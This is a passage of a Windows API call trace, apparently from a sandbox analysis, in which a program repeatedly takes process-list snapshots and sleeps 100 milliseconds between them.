th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.342] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0110.344] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0110.388] Sleep (dwMilliseconds=0x64) [0110.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0110.526] Process32First (in: hSnapshot=0x2170, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.586] Sleep (dwMilliseconds=0x64) [0110.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ec4 [0110.715] Process32First (in: hSnapshot=0x1ec4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.858] Sleep (dwMilliseconds=0x64) [0110.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0110.997] Process32First (in: hSnapshot=0x2180, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.076] Sleep (dwMilliseconds=0x64) [0111.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2190 [0111.198] Process32First (in: hSnapshot=0x2190, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.331] Sleep (dwMilliseconds=0x64) [0111.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x216c [0111.450] Process32First (in: hSnapshot=0x216c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.557] Sleep (dwMilliseconds=0x64) [0111.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21a4 [0111.732] Process32First (in: hSnapshot=0x21a4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.781] Sleep (dwMilliseconds=0x64) [0111.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0111.919] Process32First (in: hSnapshot=0x2198, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.969] Sleep (dwMilliseconds=0x64) [0112.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21a0 [0112.102] Process32First (in: hSnapshot=0x21a0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.166] Sleep (dwMilliseconds=0x64) [0112.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2194 [0112.300] Process32First (in: hSnapshot=0x2194, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.348] Sleep (dwMilliseconds=0x64) [0112.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d4 [0112.513] Process32First (in: hSnapshot=0x21d4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.604] Sleep (dwMilliseconds=0x64) [0112.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0112.790] Process32First (in: hSnapshot=0x2178, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.977] Sleep (dwMilliseconds=0x64) [0113.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.115] Process32First (in: hSnapshot=0x2178, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.229] Sleep (dwMilliseconds=0x64) [0113.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f0 [0113.366] Process32First (in: hSnapshot=0x21f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.481] Sleep (dwMilliseconds=0x64) [0113.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.655] Process32First (in: hSnapshot=0x2178, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.720] Sleep (dwMilliseconds=0x64) [0113.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f4 [0113.842] Process32First (in: hSnapshot=0x21f4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.960] Sleep (dwMilliseconds=0x64) [0114.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21fc [0114.269] Process32First (in: hSnapshot=0x21fc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.373] Sleep (dwMilliseconds=0x64) [0114.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21ec [0114.507] Process32First (in: hSnapshot=0x21ec, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.551] Sleep (dwMilliseconds=0x64) [0114.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2204 [0114.717] Process32First (in: hSnapshot=0x2204, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.762] Sleep (dwMilliseconds=0x64) [0114.884] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d8 [0114.892] Process32First (in: hSnapshot=0x21d8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.938] Sleep (dwMilliseconds=0x64) [0115.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x221c [0115.086] Process32First (in: hSnapshot=0x221c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.153] Sleep (dwMilliseconds=0x64) [0115.315] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21e8 [0115.323] Process32First (in: hSnapshot=0x21e8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.381] Sleep (dwMilliseconds=0x64) [0115.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2228 [0115.523] Process32First (in: hSnapshot=0x2228, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.668] Sleep (dwMilliseconds=0x64) [0115.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x223c [0115.806] Process32First (in: hSnapshot=0x223c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.901] Sleep (dwMilliseconds=0x64) [0116.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2244 [0116.034] Process32First (in: hSnapshot=0x2244, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.099] Sleep (dwMilliseconds=0x64) [0116.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2248 [0116.246] Process32First (in: hSnapshot=0x2248, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.381] Sleep (dwMilliseconds=0x64) [0116.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x223c [0116.524] Process32First (in: hSnapshot=0x223c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.635] Sleep (dwMilliseconds=0x64) [0116.758] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2250 [0116.772] Process32First (in: hSnapshot=0x2250, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.835] Sleep (dwMilliseconds=0x64) [0116.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2254 [0116.957] Process32First (in: hSnapshot=0x2254, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.097] Sleep (dwMilliseconds=0x64) [0117.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2218 [0117.239] Process32First (in: hSnapshot=0x2218, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.338] Sleep (dwMilliseconds=0x64) [0117.451] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x225c [0117.461] Process32First (in: hSnapshot=0x225c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.524] Sleep (dwMilliseconds=0x64) [0117.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d8 [0117.691] Process32First (in: hSnapshot=0x21d8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.931] Sleep (dwMilliseconds=0x64) [0118.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2238 [0118.077] Process32First (in: hSnapshot=0x2238, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.215] Sleep (dwMilliseconds=0x64) [0118.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x226c [0118.338] Process32First (in: hSnapshot=0x226c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.449] Sleep (dwMilliseconds=0x64) [0118.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2268 [0118.576] Process32First (in: hSnapshot=0x2268, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.628] Sleep (dwMilliseconds=0x64) [0118.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228c [0118.797] Process32First (in: hSnapshot=0x228c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.918] Sleep (dwMilliseconds=0x64) [0119.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2284 [0119.076] Process32First (in: hSnapshot=0x2284, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.226] Sleep (dwMilliseconds=0x64) [0119.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2298 [0119.397] Process32First (in: hSnapshot=0x2298, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.482] Sleep (dwMilliseconds=0x64) [0119.636] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2280 [0119.647] Process32First (in: hSnapshot=0x2280, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.711] Sleep (dwMilliseconds=0x64) [0119.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2298 [0119.854] Process32First (in: hSnapshot=0x2298, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.163] Sleep (dwMilliseconds=0x64) [0120.285] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2298 [0120.297] Process32First (in: hSnapshot=0x2298, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.350] Sleep (dwMilliseconds=0x64) [0120.465] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a8 [0120.480] Process32First (in: hSnapshot=0x22a8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.606] Sleep (dwMilliseconds=0x64) [0120.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0120.730] Process32First (in: hSnapshot=0x22a0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.796] Sleep (dwMilliseconds=0x64) [0120.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0120.958] Process32First (in: hSnapshot=0x2274, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.079] Sleep (dwMilliseconds=0x64) [0121.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d8 [0121.221] Process32First (in: hSnapshot=0x21d8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.279] Sleep (dwMilliseconds=0x64) [0121.433] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2294 [0121.444] Process32First (in: hSnapshot=0x2294, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.499] Sleep (dwMilliseconds=0x64) [0121.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2174 [0121.639] Process32First (in: hSnapshot=0x2174, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.783] Sleep (dwMilliseconds=0x64) [0121.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2260 [0121.959] Process32First (in: hSnapshot=0x2260, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.004] Sleep (dwMilliseconds=0x64) [0122.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22d4 [0122.132] Process32First (in: hSnapshot=0x22d4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.255] Sleep (dwMilliseconds=0x64) [0122.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22dc [0122.446] Process32First (in: hSnapshot=0x22dc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.493] Sleep (dwMilliseconds=0x64) [0122.665] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22d8 [0122.678] Process32First (in: hSnapshot=0x22d8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.732] Sleep (dwMilliseconds=0x64) [0122.857] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22d0 [0122.865] Process32First (in: hSnapshot=0x22d0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.987] Sleep (dwMilliseconds=0x64) [0123.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22fc [0123.150] Process32First (in: hSnapshot=0x22fc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.238] Sleep (dwMilliseconds=0x64) [0123.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22f0 [0123.415] Process32First (in: hSnapshot=0x22f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.459] Sleep (dwMilliseconds=0x64) [0123.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2310 [0123.586] Process32First (in: hSnapshot=0x2310, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.713] Sleep (dwMilliseconds=0x64) [0123.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22c4 [0123.903] Process32First (in: hSnapshot=0x22c4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.962] Sleep (dwMilliseconds=0x64) [0124.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2310 [0124.129] Process32First (in: hSnapshot=0x2310, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.174] Sleep (dwMilliseconds=0x64) [0124.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0124.302] Process32First (in: hSnapshot=0x2320, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.412] Sleep (dwMilliseconds=0x64) [0124.595] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2330 [0124.604] Process32First (in: hSnapshot=0x2330, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 